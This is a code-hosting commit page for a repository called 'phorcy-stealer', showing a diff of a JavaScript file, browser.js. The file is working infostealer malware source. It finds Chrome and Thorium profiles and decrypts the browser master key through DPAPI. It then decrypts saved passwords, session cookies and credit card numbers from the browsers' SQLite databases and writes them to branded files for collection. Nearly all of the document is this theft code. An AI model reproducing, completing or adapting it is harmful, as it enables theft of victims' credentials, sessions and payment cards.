whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update browser.js

Browse Source
This commit is contained in:
gumbobr0t
2023-11-20 20:52:46 +01:00
committed by GitHub
parent b34853e802
commit dcd41428c7
1 changed files with 302 additions and 148 deletions
Download Patch File Download Diff File Expand all files Collapse all files

360
Utils/browser.js
View File

@@ -1,23 +1,35 @@
const os = require('os'); const os = require('os');
const fs = require('fs'); const fs = require('fs');
const sqlite3 = require('sqlite3').verbose(); const sqlite3 = require('sqlite3').verbose();
const dpapi = require('./node-dpapi');
const crypto = require('crypto') const crypto = require('crypto')
const path = require('path') const path = require('path')
const dpapi = require('./node-dpapi');
class BrowserStealing { class BrowserStealing {
constructor() { constructor() {
this.phorcyDir = path.join(os.homedir(), 'AppData', 'Roaming', 'Phorcy') this.local = process.env.LOCALAPPDATA
this.browserPaths = [path.join(os.homedir(), 'AppData', 'Local', 'Google', 'Chrome', 'User Data'), path.join(os.homedir(), 'AppData', 'Local', 'Thorium', 'User Data')] this.phorcyDir = path.join(this.local, 'Phorcy');
this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'] this.browserPaths = [path.join(this.local, 'Google', 'Chrome', 'User Data'), path.join(this.local, 'Thorium', 'User Data')];
this.password_command = 'SELECT action_url, username_value, password_value FROM logins'; this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'];
//this.cookie_command = 'SELECT * FROM cookies'; this.tempDir = path.join(this.local, 'Temp');
this.tempDir = `${os.homedir()}\\AppData\\Local\\Temp`;
this.tempDirCreated = `${this.tempDir}\\${Math.random().toString(36).substring(7)}`;
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt')
//this.cookie_count = 0 this.password_command = 'SELECT action_url, username_value, password_value FROM logins';
this.password_count = 0 this.cookie_command = 'SELECT host_key, name, encrypted_value, expires_utc FROM cookies';
this.cc_command = 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards';
//this.history_command = 'SELECT url, title, last_visit_time FROM urls';
//this.downloads_command = 'SELECT tab_url, target_path FROM downloads';
this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt');
this.cookieFile = path.join(this.phorcyDir, 'browser_cookies.txt');
this.ccFile = path.join(this.phorcyDir, 'browser_creditcards.txt');
//this.historyFile = path.join(this.phorcyDir, 'browser_history.txt');
//this.downloadsFile = path.join(this.phorcyDir, 'browser_downloads.txt');
this.password_count = 0;
this.cookie_count = 0;
this.cc_count = 0;
//this.history_count = 0;
//this.downloads_count = 0;
} }
generateRandomString() { generateRandomString() {
@@ -25,149 +37,291 @@ class BrowserStealing {
return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`; return `${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}-${randomCharacter()}${randomCharacter()}${Math.random().toString(36).substring(2, 7).toUpperCase()}`;
} }
async getPasswords() { fileExists(filePath) {
fs.mkdir(this.tempDirCreated, (error) => { try {
if (error) { fs.accessSync(filePath, fs.constants.F_OK);
console.error('Error creating temp directory:', error); return true;
return; } catch (err) {
return false;
}
} }
console.log('Temp Directory created successfully.');
for (const browserPath of this.browserPaths) {
console.log(browserPath);
const local_state = path.join(browserPath, 'Local State');
console.log(local_state);
fs.readFile(local_state, 'utf8', (err, data) => { getKey(local_stateFile, callback) {
fs.readFile(local_stateFile, 'utf8', (err, data) => {
if (err) { if (err) {
console.error('Error reading local state file:', err); console.error(err);
return; return;
} }
const encrypted = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5); const encryptedKey = Buffer.from(JSON.parse(data).os_crypt.encrypted_key, 'base64').slice(5);
const decrypted = dpapi.unprotectData(Buffer.from(encrypted,"utf-8"), null, "CurrentUser"); const decryptedKey = dpapi.unprotectData(encryptedKey, null, "CurrentUser");
console.log('Decryption Key:', decrypted); console.log('Decryption Key:', decryptedKey);
for (const profile of this.browserProfiles) { //return decryptedKey;
const password_file = path.join(browserPath, profile, 'Login Data') callback(null, decryptedKey);
console.log(password_file) });
const decryption_file = path.join(this.tempDirCreated, this.generateRandomString())
console.log(decryption_file)
fs.copyFile(password_file, decryption_file, (error) => {
if (error) {
console.error('Error copying login data file:', error);
return;
} }
console.log('Login data file copied successfully.');
const db = new sqlite3.Database(decryption_file, sqlite3.OPEN_READWRITE, (err) => { getPassword(loginFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(loginFile, tempFile, (err) => {
if (err) { if (err) {
console.error('Error opening login database:', err); console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return; return;
} }
db.all(this.password_command, (err, rows) => { db.all(this.password_command, (err, rows) => {
if (err) { if (err) {
console.error('Error executing login SQLite command:', err); console.error(err);
} else { } else {
const formattedRows = rows.map(row => { rows.map(row => {
if (row && row['password_value']) { if (row && row['password_value']) {
let password_value = row['password_value']; let password_value = row['password_value'];
let start = password_value.slice(3, 15), let start = password_value.slice(3, 15),
middle = password_value.slice(15, password_value.length - 16), middle = password_value.slice(15, password_value.length - 16),
end = password_value.slice(password_value.length - 16, password_value.length), end = password_value.slice(password_value.length - 16, password_value.length),
decipher = crypto.createDecipheriv('aes-256-gcm', decrypted, start); decipher = crypto.createDecipheriv('aes-256-gcm', masterKey, start);
decipher.setAuthTag(end); decipher.setAuthTag(end);
this.password_count++; this.password_count++;
try { try {
const formattedContent = `+------------------------+\n| URL: ${row.action_url ? row.action_url.toString() : ''} |\n| Username: ${row.username_value ? row.username_value.toString() : ''} |\n| Password: ${decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString()} |\n`; const passwordList = `+------------------------+\n| URL: ${row.action_url ? row.action_url.toString() : ''} |\n| Username: ${row.username_value ? row.username_value.toString() : ''} |\n| Password: ${decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString()} |\n`;
fs.writeFileSync(this.passwordFile, passwordList, { flag: 'a' });
fs.writeFileSync(this.passwordFile, formattedContent, { flag: 'a' });
console.log(`Password written to file successfully.`);
} catch (err) { } catch (err) {
console.error('Error writing password to file:', err); console.error(err);
} }
//return {
// action_url: row.action_url ? row.action_url.toString() : '',
// username_value: row.username_value ? row.username_value.toString() : '',
// password_value: decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8').toString(),
//};
} else {
return {
action_url: '',
username_value: '',
password_value: '',
};
} }
}); });
console.log('Password list:', formattedRows);
console.log('Password count:', this.password_count);
} }
db.close((err) => { db.close((err) => {
if (err) { if (err) {
console.error('Error closing login database:', err); console.error(err);
} }
}); });
console.log('Password count:', this.password_count)
}); });
}); });
}); });
fs.unlink(decryption_file, (error) => {
if (error) {
console.error('Error deleting decryption password file:', error);
} else {
console.log('Decryption password File deleted successfully.');
}
});
}
});
}
});
}
cleanUp() {
fs.rm(this.tempDirCreated, { recursive: true }, (error) => {
if (error) {
console.error('Error deleting temp directory:', error);
} else {
console.log('Temp Directory deleted successfully.');
}
});
fs.rm(this.phorcyDir, { recursive: true }, (error) => { if (this.fileExists(tempFile)) {
if (error) { fs.unlink(tempFile, (err) => {
console.error('Error deleting Phorcy directory:', error); if (err) {
} else { console.error(err);
console.log('Phorcy Directory deleted successfully.');
} }
}); });
} }
};
getCookie(cookieFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(cookieFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cookie_command, (err, rows) => {
if (err) {
console.error(err);
} else {
let decrypted;
rows.map(row => {
if (row && row['encrypted_value']) {
let cookie_value = row['encrypted_value'];
let first = cookie_value.slice(3, 15),
middle = cookie_value.slice(
15,
cookie_value.length - 16
),
end = cookie_value.slice(cookie_value.length-16,cookie_value.length),decipher=crypto.createDecipheriv("aes-256-gcm",masterKey,first);
decipher.setAuthTag(end),decrypted=decipher.update(middle,"base64","utf-8")+decipher.final("utf-8");
this.cookie_count++;
async prepare() {
try { try {
fs.mkdirSync(this.phorcyDir); const cookieList = `+------------------------+\n| Host: ${row["host_key"]} |\n| Name: ${row.name ? row.name.toString() : ''} |\n| Cookie value: ${decrypted} |\n| Expiration: ${row['expires_utc']} |\n`;
console.log('Phorcy Directory created successfully.'); fs.writeFileSync(this.cookieFile, cookieList, { flag: 'a' });
} catch (err) { } catch (err) {
console.error('Error creating Phorcy directory:', err.message) console.error(err);
} }
} }
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Cookie count:', this.cookie_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
getCreditCard(ccFile, masterKey) {
const tempFile = path.join(this.tempDir, this.generateRandomString());
fs.copyFile(ccFile, tempFile, (err) => {
if (err) {
console.error(err);
}
const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => {
if (err) {
console.error(err);
return;
}
db.all(this.cc_command, (err, rows) => {
if (err) {
console.error(err);
} else {
let decrypted;
rows.map(row => {
if (row && row['card_number_encrypted']) {
let cc_value = row['card_number_encrypted'];
let first = cc_value.slice(3, 15),
middle = cc_value.slice(
15,
cc_value.length - 16
),
end = cc_value.slice(cc_value.length-16,cc_value.length),decipher=crypto.createDecipheriv("aes-256-gcm",masterKey,first);
decipher.setAuthTag(end),decrypted=decipher.update(middle,"base64","utf-8")+decipher.final("utf-8");
this.cc_count++;
try {
const ccList = `+------------------------+\n| Name: ${row['name_on_card']} |\n| Credit Card Number: ${decrypted} |\n| Expiration: ${row['expiration_month']}/${row['expiration_year']} |\n`;
fs.writeFileSync(this.ccFile, ccList, { flag: 'a' });
} catch (err) {
console.error(err);
}
}
});
}
db.close((err) => {
if (err) {
console.error(err);
}
});
console.log('Credit Card count:', this.cc_count)
});
});
});
if (this.fileExists(tempFile)) {
fs.unlink(tempFile, (err) => {
if (err) {
console.error(err);
}
});
}
};
async Main() { async Main() {
await this.prepare(); // password grabber
await this.getPasswords(); fs.writeFileSync(this.passwordFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
setTimeout(function() { for (const browserPath of this.browserPaths) {
console.log("Browser stealing complete. Cleaning."); if (this.fileExists(browserPath)) {
this.cleanUp(); const localState = path.join(browserPath, 'Local State');
}.bind(this), 4000); if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const passwordFile = path.join(browserPath, profile, 'Login Data');
if (this.fileExists(passwordFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getPassword(passwordFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
// cookie grabber
fs.writeFileSync(this.cookieFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const cookieFile = path.join(browserPath, profile, 'Network', 'Cookies');
if (this.fileExists(cookieFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getCookie(cookieFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
// cc grabber
fs.writeFileSync(this.ccFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' });
for (const browserPath of this.browserPaths) {
if (this.fileExists(browserPath)) {
const localState = path.join(browserPath, 'Local State');
if (this.fileExists(localState)) {
for (const profile of this.browserProfiles) {
const ccFile = path.join(browserPath, profile, 'Web Data');
if (this.fileExists(ccFile)) {
try {
this.getKey(localState, (err, key) => {
if (err) {
console.error(err);
} else {
this.getCreditCard(ccFile, key);
}
});
} catch (err) {
console.error(err);
}
}
}
}
}
}
} }
} }
const browserStealer = new BrowserStealing(); const browserStealer = new BrowserStealing()
browserStealer.Main(); browserStealer.Main()
console.log('Hello, World!')